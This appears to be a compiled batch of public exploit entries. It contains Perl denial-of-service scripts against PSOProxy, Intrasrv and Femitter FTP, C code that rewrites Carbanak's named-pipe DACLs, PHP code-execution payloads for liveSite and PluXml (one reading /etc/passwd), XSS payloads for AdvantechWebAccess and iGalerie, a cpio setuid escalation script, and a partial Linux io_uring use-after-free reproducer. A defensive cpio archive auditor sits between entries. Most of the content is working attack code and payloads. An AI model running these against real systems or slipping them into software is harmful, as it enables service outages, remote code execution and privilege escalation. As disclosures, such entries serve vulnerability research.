<pre><code>#!/usr/bin/perl

use strict;
use warnings;
use IO::Socket::INET;

# Exploit Title: PSOProxy 0.5 - Denial of Service (DoS)
# Discovery by: Fernando Mengali
# Discovery Date: 10 January 2024
# Vendor Homepage: https://sourceforge.net/projects/psoproxy/files/psoproxy/0.5/
# Download to demo: https://drive.google.com/file/d/1GC2GWGOx9Z1vWT_mxnGXHuTptuHa7lIp/view?usp=sharing
# Download to demo 2: https://drive.google.com/file/d/1DHQ1sZL3mqlqFWn50eq7FLVtzX3E6qgC/view?usp=sharing
# Notification vendor: Not reported
# Tested Version: PSOProxy 0.5
# Tested on: Windows XP Professional - Service Pack 2 and 3 - English
# Vulnerability Type: Denial of Service (DoS)
# Video: https://www.youtube.com/watch?v=0uuUqfpRbHM

#1. Description

#This technique works fine against Windows XP Professional Service Pack 2 and 3 (English).
#For this exploit I have tried several strategies to increase reliability and performance:
#Jump to a static 'call esp'
#Backwards jump to code a known distance from the stack pointer.
#The server does not properly handle requests that carry large amounts of data.
#The following request sends a large amount of data to the web server to process; the server crashes as soon as the data is received and processed, causing a denial of service condition.
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

our ($ip, $port);   # filled in by main() from @ARGV

my $sis = $^O;      # "MSWin32" on Windows
my $cmd = ($sis eq "MSWin32") ? "cls" : "clear";

system($cmd);

intro();
main();

print "\t ==> Connecting to webserver... \n\n";
sleep(1);

my $i = 0;
print "\t ==> Exploiting... \n\n";
while ($i <= 9) {
    my $sock = IO::Socket::INET->new(
        PeerAddr => $ip,
        PeerPort => $port,
        Proto    => 'tcp',
    ) or die "Cannot connect to $ip:$port: $!\n";

    my $buffer = "A" x 3000;
    my $shellcode = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" .
                    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";

    $buffer .= "\x0F\x98\xF8\x77" . $shellcode;

    print $sock $buffer . "\r\n";
    close($sock);

    $i++;
}

print "\t ==> Done! Exploited!";

sub intro {
    print q {

 ,--,
 _ ___/ /\|
 ,;'( )__, ) ~
 // // '--;
 ' \ | ^
 ^ ^

 [+] PSOProxy 0.5 - Denial of Service (DoS)

 [*] Coded by Fernando Mengali

 [@] e-mail: fernando.mengalli@gmail.com

 };
}

sub main {
    ($ip, $port) = @ARGV;

    unless (defined($ip) && defined($port)) {
        print "\n\tUsage: $0 <ip> <port> \n";
        exit(-1);
    }
}

#3. Solution/ How to fix:

# This version of the product is deprecated

</code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024
Original source: https://malvuln.com/advisory/b8e1e5b832e5947f41fd6ae6ef6d09a1.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32 Carbanak (Anunak)
Vulnerability: Named Pipe Null DACL
Family: Carbanak
Type: PE32
MD5: b8e1e5b832e5947f41fd6ae6ef6d09a1
Vuln ID: MVID-2024-0667
Dropped files: AlhEXlUJ.exe, AlhEXlUJbVpfX1EMVw.bin
Disclosure: 01/09/2024

Description: Carbanak malware creates 8 named pipes used for C2 and interprocess communications and grants RW access to the Everyone user group.
Low privileged users can modify the pipes' DACLs, removing rights for Everyone and denying access to all users. The first 6 pipes are created by its parent process
and the last 2 by the child process. The pipe names are randomly generated each time it is run, all except for one: JFNfVUYDXmlZQVI.

Therefore, we can detect Carbanak by that one pipe, as the "JFNfVUYDXmlZQVI" pipe is always created regardless of the other randomly named pipes.
Listing Carbanak's named pipes, they are grouped as they are created at the same time, with 2 of them listed prior to the JFNfVUYDXmlZQVI pipe.

Carbanak creates a directory named "Mozilla" under ProgramData with hidden files, one of which is AlhEXlUJ.exe, used by the service it creates,
which runs as SYSTEM. The malware's service names appear to reuse an already existing service name with "Sys" appended to it.

Exploitation steps: output all named pipes and look for "JFNfVUYDXmlZQVI"; if detected, exploit the DACL on the 2 previously listed pipes and the 5 pipes listed after it.

Successfully tested in VM environment.

Carbanak IPC Named Pipes:

\\.\Pipe\cltjLnYRKKjUESTvgGdmERTb
  RW Everyone
\\.\Pipe\tGYNSgZvVXwumEhdcF
  RW Everyone
\\.\Pipe\JFNfVUYDXmlZQVI <===== ALWAYS CREATED
  RW Everyone
\\.\Pipe\PoUXbOHFRuUZAufnlpMZoqdtIfOX
  RW Everyone
\\.\Pipe\oBcVHguxbnjGbSgkJptifqvNFgD
  RW Everyone
\\.\Pipe\iDToHxpSCbEIEHPBeQ
  RW Everyone
\\.\Pipe\YutsGUYwwUusszByeuXUQK
  RW Everyone
\\.\Pipe\UfnQmAUTVtEkYvMoUWAZekAuWZHe
  RW Everyone

Exploit/PoC:
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <accctrl.h>
#include <aclapi.h>

/*
Carbanak: 48d208b87b29d50bb160f336c94b681e232b0f90e8c02175e593d60737369c13
DACL IPC named pipes created and grants RW access for Everyone.
We can identify Carbanak as out of the eight pipes it creates with random names the pipe
named JFNfVUYDXmlZQVI is always created. Pipes are typically grouped as they are created
at same time and typically 2 are previous to pipe JFNfVUYDXmlZQVI and others are created after
Output named pipes find JFNfVUYDXmlZQVI and exploit DACL on 2 previous and 5 after.
Successfully tested in VM environment.
By Malvuln
**/

/** DISCLAIMER:
Author is NOT responsible for any damages whatsoever by using this software or improper malware
handling. By using this code you assume and accept all risk implied or otherwise.
**/

#define CARBANAK_PIPE "JFNfVUYDXmlZQVI"
#define MAX_TOKENS 1024
#define DELIMITER "\n"

int str2Array(char*** argv, char *str);
int Exploit(char *carbanak_pipe);

/* Split the newline-separated pipe listing into an array of pipe names; returns the count. */
int str2Array(char*** argv, char *str){
    char* buffer;
    int argc;
    buffer = (char *) malloc(strlen(str) + 1);          /* +1 leaves room for the terminating NUL */
    if (buffer == NULL) return 0;
    strcpy(buffer, str);
    (*argv) = (char**) malloc(MAX_TOKENS * sizeof(char*));
    if (*argv == NULL) return 0;
    argc = 0;
    (*argv)[argc] = strtok(buffer, DELIMITER);
    /* stop one short of MAX_TOKENS so the index never runs past the allocation */
    while ((*argv)[argc] != NULL && argc < MAX_TOKENS - 1){
        ++argc;
        (*argv)[argc] = strtok(NULL, DELIMITER);
    }
    return argc;
}

int main(void){
    int ch;
    long bytes;
    size_t len = 0;
    char *x;
    char **A;
    FILE *fp;
    int i, k, result;
    int delay = 300;
    int rc = 1;                 /* stays non-zero unless the last DACL change succeeds */
    BOOL infected = FALSE;
    /* order of the original attack: the detected pipe, the 2 listed before it, then the 5 after it */
    static const int offsets[] = { 0, -2, -1, 1, 2, 3, 4, 5 };

    /* enumerate the named pipe namespace into a scratch file */
    system("dir /b \\\\.\\pipe\\\\ > tmp.sys");

    fp = fopen("tmp.sys", "r");
    if (fp == NULL){
        printf("[!] Could not read the pipe listing\n");
        return 1;
    }
    fseek(fp, 0, SEEK_END);
    bytes = ftell(fp) + 256;
    rewind(fp);
    x = (char *) malloc((size_t)bytes);
    if (x == NULL){
        fclose(fp);
        return 1;
    }
    /* append each character directly; text mode folds the CRLF line endings to '\n' */
    while ((ch = fgetc(fp)) != EOF && len < (size_t)bytes - 1){
        x[len++] = (char) ch;
    }
    x[len] = '\0';
    fclose(fp);

    result = str2Array(&A, x);

    for (i = 0; i < result; i++){
        if (strcmp(A[i], CARBANAK_PIPE) == 0){
            printf("[+] Carbanak (Anunak) malware IPC exploit\n");
            printf("[!] MD5: b8e1e5b832e5947f41fd6ae6ef6d09a1\n");
            printf("[!] Named Pipe %s%s\n", CARBANAK_PIPE, " detected!");
            printf("[+] Attack started...\n\n");

            infected = TRUE;

            for (k = 0; k < (int)(sizeof(offsets) / sizeof(offsets[0])); k++){
                int idx = i + offsets[k];
                if (idx < 0 || idx >= result) continue;   /* neighbouring pipe not present in the listing */
                rc = Exploit(A[idx]);
                Sleep(delay);
            }
        }
    }
    if (!infected){
        printf("[+] Carbanak (Anunak) malware IPC Exploit \n");
        printf("[+] MD5: b8e1e5b832e5947f41fd6ae6ef6d09a1\n");
        printf("[!] Named Pipe %s%s", CARBANAK_PIPE, " not found on the system.\n");
        printf("[!] Aborting...");
    }
    if (rc == 0){
        printf("\n[!] Done!");
    }
    printf("\n[+] By Malvuln circa 2024\n\n");
    system("pause");
    free(x);

    return 0;
}


int Exploit(char *malpipe){
    char MALPIPE_PREFIX[269];
    HANDLE hPipe;
    PSECURITY_DESCRIPTOR pSD = NULL;
    PACL pOldDACL = NULL;
    PACL pNewDACL = NULL;
    TRUSTEE trustee[1];
    EXPLICIT_ACCESS explicit_access_list[1];
    DWORD err;

    /* snprintf rather than strcat so an over-long pipe name cannot overrun the buffer */
    snprintf(MALPIPE_PREFIX, sizeof(MALPIPE_PREFIX), "\\\\.\\pipe\\%s", malpipe);
    hPipe = CreateFileA((LPCSTR)MALPIPE_PREFIX, GENERIC_WRITE | WRITE_DAC, 0, NULL, OPEN_EXISTING, 0, NULL);

    if (hPipe == INVALID_HANDLE_VALUE){
        if (GetLastError() == ERROR_ACCESS_DENIED){
            printf("[!] Access Denied for pipe: %s\n", malpipe);
        }
        return 1;
    }

    /* also request the security descriptor: the DACL pointer points into it and it is what gets freed */
    err = GetSecurityInfo(hPipe, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, &pOldDACL, NULL, &pSD);
    if (err != ERROR_SUCCESS){
        printf("[!] Error: %lu\n", err);
        CloseHandle(hPipe);
        return 1;
    }

    trustee[0].TrusteeForm = TRUSTEE_IS_NAME;
    trustee[0].TrusteeType = TRUSTEE_IS_GROUP;
    trustee[0].ptstrName = TEXT("Everyone");
    trustee[0].MultipleTrusteeOperation = NO_MULTIPLE_TRUSTEE;
    trustee[0].pMultipleTrustee = NULL;

    ZeroMemory(&explicit_access_list[0], sizeof(EXPLICIT_ACCESS));

    /* deny-ACE for Everyone placed ahead of the existing allow entries */
    explicit_access_list[0].grfAccessMode = DENY_ACCESS;
    explicit_access_list[0].grfAccessPermissions = GENERIC_ALL;
    explicit_access_list[0].grfInheritance = NO_INHERITANCE;
    explicit_access_list[0].Trustee = trustee[0];

    /* SetEntriesInAcl returns the error code itself rather than setting the last-error value */
    err = SetEntriesInAcl(1, explicit_access_list, pOldDACL, &pNewDACL);
    if (err != ERROR_SUCCESS){
        printf("[!] Error: %lu\n", err);
        LocalFree(pSD);
        CloseHandle(hPipe);
        return 1;
    }

    err = SetSecurityInfo(hPipe, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDACL, NULL);
    if (err != ERROR_SUCCESS){
        printf("[!] Error: %lu\n", err);
    }else{
        printf("[+] Modifying IPC Pipe DACL ==> %s\n", MALPIPE_PREFIX);
    }

    LocalFree(pNewDACL);
    LocalFree(pSD);
    CloseHandle(hPipe);

    return err == ERROR_SUCCESS ? 0 : 1;
}

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).</code></pre>
<pre><code>## Exploit Title: liveSite Version : 2019.1 Remote Code Execution
### Date: 2024-1-9
### Exploit Author: tmrswrr
### Category: Webapps
### Vendor Homepage: https://livesite.com/
### Version : 2019.1
### Tested on: https://www.softaculous.com/apps/cms/liveSite

1 ) Log in with admin credentials, click Staff Home > Edit > Designer Region Name: megamenu, and write your payload in the HTML Code Snippet field: https://127.0.0.1/liveSite/livesite/edit_designer_region.php?id=193&send_to=%2FliveSite%2Fstaff-home

    Payload : <?php echo system('cat /etc/passwd'); ?>

2 ) After saving you will see the result at: http://127.0.0.1/liveSite/staff-home

    Result: root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin systemd-bus-proxy:x:999:998:systemd Bus Proxy:/:/sbin/nologin systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin polkitd:x:998:997:User for polkitd:/:/sbin/nologin tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin chrony:x:997:995::/var/lib/chrony:/sbin/nologin soft:x:1000:1000::/home/soft:/sbin/nologin saslauth:x:996:76:Saslauthd user:/run/saslauthd:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin emps:x:995:1001::/home/emps:/bin/bash named:x:25:25:Named:/var/named:/sbin/nologin exim:x:93:93::/var/spool/exim:/sbin/nologin vmail:x:5000:5000::/var/local/vmail:/bin/bash pinguzo:x:992:992::/etc/pinguzo:/bin/false webuzo:x:987:987::/home/webuzo:/bin/bash apache:x:986:985::/home/apache:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false
</code></pre>
<pre><code>#!/usr/bin/perl

use strict;
use warnings;
use IO::Socket;

# Exploit Title: Intrasrv Simple Web Server 1.0 - Denial of Service (DoS)
# Discovery by: Fernando Mengali
# Discovery Date: 09 January 2024
# Vendor Homepage: http://www.leighb.com/intrasrv.htm
# Download to demo: http://www.leighb.com/intrasrv.zip
# Download 2 to demo: https://drive.google.com/file/d/1HuUGIGMp_L6viM-j6djGICsyxZg_SJtB/view?usp=sharing
# Notification vendor: Not reported
# Tested Version: Intrasrv Simple Web Server 1.0
# Tested on: Windows XP Professional - Service Pack 2 and 3 - English
# Vulnerability Type: Denial of Service (DoS)
# Video: https://www.youtube.com/watch?v=9u77LwLgXzU
# Video 2: https://drive.google.com/file/d/1GDVpLx5YfWdhI3ZQcG5P0EWvuR25SEjW/view?usp=sharing

#This technique works fine against Windows XP Professional Service Pack 2 and 3 (English).
#For this exploit I have tried several strategies to increase reliability and performance:
#Jump to a static 'call esp'
#Backwards jump to code a known distance from the stack pointer.
#The server does not properly handle requests that carry large amounts of data via the GET method.
#The following request sends a large amount of data to the web server to process via the GET method; the server crashes as soon as the data is received and processed, causing a denial of service condition.
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

our ($ip, $port);   # filled in by main() from @ARGV

my $sis = $^O;      # "MSWin32" on Windows
my $cmd = ($sis eq "MSWin32") ? "cls" : "clear";

system($cmd);

intro();
main();

print "[+] Exploiting... \n";

my $buffer1 = "\x41" x 4674;

my $buffer2 = "\x41" x 638;

my $buffer = "GET / HTTP/1.1\r\n";
$buffer .= "Host: " . $buffer1 . "\r\n";
$buffer .= "User-Agent: Mozilla/4.0 (Windows XP 5.1)\r\n";
$buffer .= $buffer2;

my $one = IO::Socket::INET->new(
    PeerAddr => $ip,
    PeerPort => $port,
    Proto    => 'tcp',
) or die "Could not connect to $ip: $!\n";

print $one $buffer;
close $one;

print "[+] Done - Exploited success!!!!!\n\n";

sub intro {
    print "********************************************************\n";
    print "* Intrasrv Simple Web Server 1.0 - Denial of Service *\n";
    print "* *\n";
    print "* Coded by Fernando Mengali *\n";
    print "* *\n";
    print "* e-mail: fernando.mengalli\@gmail.com *\n";
    print "* *\n";
    print "*******************************************************\n";
}

sub main {
    ($ip, $port) = @ARGV;

    unless (defined($ip) && defined($port)) {
        print " \nUsage: $0 <ip> <port> \n";
        exit(-1);
    }
}

#3. Solution/ How to fix:

# This version of the product is deprecated
</code></pre>
<pre><code>;; PostAuth SQLi in AdvantechWeb/SCADA 9.1.5U
;;
;; found: 28.12.2023
;;
;; more:
;; https://code610.blogspot.com/2024/01/postauth-sqli-in-advantechwebscada-915u.html
;;


POST /waconfig/api/odbc/getSystemLog HTTP/2
Host: 192.168.56.106
Cookie: serverLanguage=en; csrfToken=a2db29e5-68f5-4cae-917c-41767ee92911-1837; pcname=MSEDGEWIN10; rpcPort=4592; accessCode=qweqwe; socketPort=14592; account=admin; ASPSESSIONIDQWBDCRDA=MCKNMBPCPEFMMGDHFCIICAGA; ASPSESSIONIDQSBDCRDA=NCKNMBPCOGIENOGNONBOFBFF; ASP.NET_SessionId=zgqgjalvaa0x1kpcdj3ke2di; user=name=; ASPSESSIONIDCGTAATDA=OCEJBDPCJIJLPKAFFGOGHPAN
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: application/json, text/plain, */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/json;charset=utf-8
Content-Length: 359
Origin: https://192.168.56.106
Referer: https://192.168.56.106/waconfig/index
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: keep-alive

{"csrfToken":"a2db29e5-68f5-4cae-917c-41767ee92911-1837","StartDateTime":"12/28/2023 00:00:00","EndDateTime":"12/28/2023 22:20:46","Action":[2,3,4,5,6,7,8,9,10,11,13,14,15,16,12],"UserName":"ALL","IPAddress":"ALL","NodeName":"ALL","ProjName":"ALL","Orders":[{"ColumnName":"%27>%22><svg/onload=prompt(123)>","descending":"DESC"}],"PageSize":50,"CurrentPage":1}



resp:

HTTP/2 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 225
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/10.0
X-Ua-Compatible: IE=EmulateIE7
Access-Control-Allow-Origin: http://localhost:8080
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Headers: Content-Type
Access-Control-Allow-Credentials: true
Strict-Transport-Security: max-age=31536000;includeSubDomains;preload
X-Content-Type-Options: nosniff
Date: Thu, 28 Dec 2023 21:29:56 GMT

{"error":-500,"reason":"Exception captured by WebApiExceptionFilter: ERROR [42000] [Microsoft][ODBC Microsoft Access Driver] Syntax error in query expression \u0027%27\u003e%22\u003e\u003csvg/onload=prompt(123)\u003e\u0027."}


;; cheers
;;
</code></pre>
<pre><code>cpio privilege escalation vulnerability via setuid files in cpio archive

Happy New Year, may happiness be with you in 2024! :)

When extracting archives, cpio (at least version 2.13) preserves
the setuid flag, which might lead to privilege escalation.

One example is: r00t extracts to /tmp/ and scidiot runs /tmp/micq/backd00r
without further interaction from root.

We believe this is a vulnerability, since directory traversal in cpio
is considered a vulnerability.

The POC is trivial, including the bash script.

<pre>
====
#!/bin/bash
# cpio privilege escalation via setuid files in cpio archive
# author: Georgi Guninski
# date: Mon Jan 8 07:28:28 AM UTC 2024
# tested on cpio (GNU cpio) 2.13

mkdir -p /tmp/1
cd /tmp/1
touch a
chmod 4555 a
echo -n a | cpio -ocv0 > a.cpio
mkdir -p /tmp/2
cd /tmp/2
cpio -iv < ../1/a.cpio
ls -lh /tmp/2/a
#-r-sr-xr-x. 1 joro joro 0 Jan 8 09:10 /tmp/2/a
====
</pre>
</code></pre>
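As an added example (not from the post above and not GNU cpio's code), the following C program audits a newc-format archive (what `cpio -oc` writes, magic 070701) before extraction: it walks the headers without writing any files and flags members that would arrive with setuid/setgid bits, and, since the post compares the issue to directory traversal, names that would escape the extraction directory. The archive it inspects is constructed inline to mirror the post's chmod 4555 file; all function names are this example's own.

```c
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <ctype.h>

#define NEWC_HDR 110   /* "070701" magic followed by 13 eight-digit ASCII-hex fields */

/* Parse one 8-digit ASCII-hex header field; returns 0 if any digit is not hex. */
static int hexfield(const unsigned char *p, uint32_t *out) {
    char tmp[9];
    for (int i = 0; i < 8; i++) if (!isxdigit(p[i])) return 0;
    memcpy(tmp, p, 8);
    tmp[8] = '\0';
    *out = (uint32_t)strtoul(tmp, NULL, 16);
    return 1;
}

/* True if a member name would land outside the extraction directory. */
static int escapes_dir(const char *name) {
    if (name[0] == '/') return 1;
    for (const char *p = name;;) {
        const char *slash = strchr(p, '/');
        size_t n = slash ? (size_t)(slash - p) : strlen(p);
        if (n == 2 && p[0] == '.' && p[1] == '.') return 1;
        if (!slash) return 0;
        p = slash + 1;
    }
}

/* Walk a newc archive without extracting anything. Returns how many members carry
 * setuid/setgid bits or an escaping name, or -1 if the archive is malformed (bad
 * magic; truncated header, name or data). `report` may be NULL to suppress output. */
int audit_newc(const unsigned char *buf, size_t len, FILE *report) {
    size_t off = 0;
    int findings = 0;
    for (;;) {
        uint32_t mode, filesize, namesize;
        if (off > len || len - off < NEWC_HDR) return -1;
        if (memcmp(buf + off, "070701", 6) != 0) return -1;   /* newc only, not crc/odc */
        if (!hexfield(buf + off + 6 + 8 * 1, &mode) ||        /* c_mode */
            !hexfield(buf + off + 6 + 8 * 6, &filesize) ||    /* c_filesize */
            !hexfield(buf + off + 6 + 8 * 11, &namesize)) return -1;  /* c_namesize */
        size_t name_off = off + NEWC_HDR;
        if (namesize == 0 || namesize > len - name_off) return -1;
        const char *name = (const char *)buf + name_off;
        if (name[namesize - 1] != '\0') return -1;            /* name must end inside its field */
        if (strcmp(name, "TRAILER!!!") == 0) return findings;
        if (mode & 06000) {
            findings++;
            if (report) fprintf(report, "[!] mode %04o is setuid/setgid: %s\n", (unsigned)(mode & 07777), name);
        }
        if (escapes_dir(name)) {
            findings++;
            if (report) fprintf(report, "[!] name escapes the extraction dir: %s\n", name);
        }
        /* header+name is padded to a 4-byte boundary, and so is the file data after it */
        size_t data_off = (name_off + namesize + 3) & ~(size_t)3;
        if (data_off > len || filesize > len - data_off) return -1;
        off = (data_off + filesize + 3) & ~(size_t)3;
    }
}

/* Append one newc member (header, NUL-terminated name, data, padding) to `out`. */
static size_t put_entry(unsigned char *out, size_t pos, unsigned mode,
                        const char *name, const char *data) {
    unsigned namesize = (unsigned)strlen(name) + 1;
    unsigned filesize = data ? (unsigned)strlen(data) : 0;
    pos += (size_t)sprintf((char *)out + pos,
        "070701%08X%08X%08X%08X%08X%08X%08X%08X%08X%08X%08X%08X%08X",
        1u, mode, 0u, 0u, 1u, 0u, filesize, 0u, 0u, 0u, 0u, namesize, 0u);
    memcpy(out + pos, name, namesize);
    pos += namesize;
    while (pos % 4) out[pos++] = 0;
    if (filesize) { memcpy(out + pos, data, filesize); pos += filesize; }
    while (pos % 4) out[pos++] = 0;
    return pos;
}

/* Build a constructed sample (not the post's a.cpio): "a" with the post's mode 4555,
 * a harmless "b", a traversal name, then the trailer; audit it after dropping `cut`
 * trailing bytes. Expected: 2 findings intact, -1 when cut short inside the trailer. */
int audit_sample(size_t cut) {
    unsigned char arc[1024];
    size_t n = 0;
    n = put_entry(arc, n, 0100000 | 04555, "a", "");
    n = put_entry(arc, n, 0100000 | 0644, "b", "hello\n");
    n = put_entry(arc, n, 0100000 | 0644, "../escape", "x");
    n = put_entry(arc, n, 0, "TRAILER!!!", NULL);
    return audit_newc(arc, n - cut, cut ? NULL : stdout);
}
```

Run `audit_newc` over the archive bytes before handing them to `cpio -i`, and refuse the archive (or extract with `find -perm /6000` cleanup afterwards) when it returns anything but 0.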
<pre><code># Exploit Title: iGalerie Version: 3.0.22 - Reflected XSS
# Date: 2024-7-1
# Exploit Author: tmrswrr
# Vendor Homepage: https://www.igalerie.org/
# Version: 3.0.22
# Tested on: https://softaculous.com/demos/iGalerie



1 ) Go to the home page and click edit > https://127.0.0.1/iGalerie/

    Titre : "><sVg/onLy=1 onLoaD=confirm(1)//

2 ) Write your payload in the Titre field; after saving, you will see the alert box.


</code></pre>
<pre><code>#!/usr/bin/perl

use strict;
use warnings;
use Net::FTP;

# Exploit Title: Femitter FTP Server 1.03 - Denial of Service (DoS)
# Discovery by: Fernando Mengali
# Discovery Date: 08 January 2024
# Vendor Homepage: https://acritum.com/
# Download to demo: https://drive.google.com/file/d/1GBFmc7tMavA9mMoZPYVlUVUe62dGjBhF/view?usp=sharing
# Notification vendor: Not reported
# Tested Version: Femitter FTP Server 1.03
# Tested on: Windows XP Professional - Service Pack 2 and 3 - English
# Vulnerability Type: Denial of Service (DoS)
# Video: https://drive.google.com/file/d/1n_WzyNiOwHRen60en5rh56Q4AyDfVbF_/view?usp=sharing

#1. Description

#This technique works fine against Windows XP Professional Service Pack 2 and 3 (English).
#For this exploit I have tried several strategies to increase reliability and performance:
#Jump to a static 'call esp'
#Backwards jump to code a known distance from the stack pointer.
#The server does not correctly handle the amount of data or bytes of the RETR command, resulting in memory corruption.
#When authenticated to the FTP server, a long RETR (a RETR with a large number of characters for the server to process) crashes the server as soon as it is received and processed, causing a denial of service condition.
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

our ($ip, $port);   # filled in by main() from @ARGV

my $sis = $^O;      # "MSWin32" on Windows
my $cmd = ($sis eq "MSWin32") ? "cls" : "clear";

system($cmd);

intro();
main();

print "[+] Exploiting... \n";

my $payload = "\x41\x2C\x41\x20\x42" x 500;

my $ftp = Net::FTP->new($ip, Port => $port, Debug => 0) or die "Could not connect: $@";

my $sc = "A" x 800;

$ftp->login("anon", "anon") or die "Failed: " . $ftp->message;

# quot() appends the CRLF itself
$ftp->quot("RETR " . $sc) or die "Error: " . $ftp->message;
$ftp->quot("RETR " . $sc) or die "Error: " . $ftp->message;

$ftp->quit;

print "[+] Done - Exploited success!!!!!\n\n";

sub intro {
    print "######################################################################\n";
    print "# Femitter FTP Server 1.03 - Denial of Service #\n";
    print "# #\n";
    print "# Coded by Fernando Mengali #\n";
    print "# #\n";
    print "# e-mail: fernando.mengalli\@gmail.com #\n";
    print "# #\n";
    print "######################################################################\n";
}

sub main {
    ($ip, $port) = @ARGV;

    unless (defined($ip) && defined($port)) {
        print " \nUsage: $0 <ip> <port> \n";
        exit(-1);
    }
}

#3. Solution/ How to fix:

# This version of the product is deprecated
</code></pre>
<pre><code>## Exploit Title: PluXml Blog Version : 5.8.9 - Remote Code Execution (Authenticated)
### Date: 2024-1-7
### Exploit Author: tmrswrr
### Category: Webapps
### Vendor Homepage: https://pluxml.org/
### Version : 5.8.9
### Tested on: https://www.softaculous.com/apps/cms/PluXml

1 ) After logging in, click Static pages > Edit and write your payload in the content field: https://127.0.0.1/PluXml/core/admin/statique.php?p=001

    Payload : <?php echo system('id'); ?>

2 ) Save and view the Static 1 page on the site: https://127.0.0.1/PluXml/static1/static-1

    Result: uid=1000(soft) gid=1000(soft) groups=1000(soft) uid=1000(soft) gid=1000(soft) groups=1000(soft)

</code></pre>
<pre><code>Linux >=6.4: io_uring: page UAF via buffer ring mmap

Since commit c56e022c0a27 ("io_uring: add support for user mapped provided
buffer ring"), landed in Linux 6.4, io_uring makes it possible to allocate,
mmap, and deallocate "buffer rings".

A "buffer ring" can be allocated with
io_uring_register(..., IORING_REGISTER_PBUF_RING, ...) and later deallocated
with io_uring_register(..., IORING_UNREGISTER_PBUF_RING, ...).
It can be mapped into userspace using mmap() with offset
IORING_OFF_PBUF_RING|..., which creates a VM_PFNMAP mapping, meaning the MM
subsystem will treat the mapping as a set of opaque page frame numbers not
associated with any corresponding pages; this implies that the calling code is
responsible for ensuring that the mapped memory can not be freed before the
userspace mapping is removed.

However, there is no mechanism to ensure this in io_uring: It is possible to
just register a buffer ring with IORING_REGISTER_PBUF_RING, mmap() it, and then
free the buffer ring's pages with IORING_UNREGISTER_PBUF_RING, leaving free
pages mapped into userspace, which is a fairly easily exploitable situation.

reproducer:

==============================================================
#define _GNU_SOURCE
#include <unistd.h>
#include <err.h>
#include <string.h>
#include <stdio.h>
#include <ctype.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <linux/io_uring.h>

#define SYSCHK(x) ({ \
  typeof(x) __res = (x); \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res; \
})

int main(void) {
  struct io_uring_params params = {
    .flags = IORING_SETUP_NO_SQARRAY
  };
  int uring_fd = SYSCHK(syscall(__NR_io_uring_setup, /*entries=*/40, &params));
  printf("uring_fd = %d\n", uring_fd);

  struct io_uring_buf_reg reg = {
    .ring_entries = 1,
    .bgid = 0,
    .flags = IOU_PBUF_RING_MMAP
  };
  SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_REGISTER_PBUF_RING, &reg, 1));

  void *pbuf_mapping = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_PBUF_RING));
  printf("pbuf mapped at %p\n", pbuf_mapping);

  struct io_uring_buf_reg unreg = { .bgid = 0 };
  SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_UNREGISTER_PBUF_RING, &unreg, 1));
  while (1) {
    memset(pbuf_mapping, 0xaa, 0x1000);
    usleep(100000);
  }
}
==============================================================

When run on a system with the debug options:

  CONFIG_PAGE_TABLE_CHECK=y
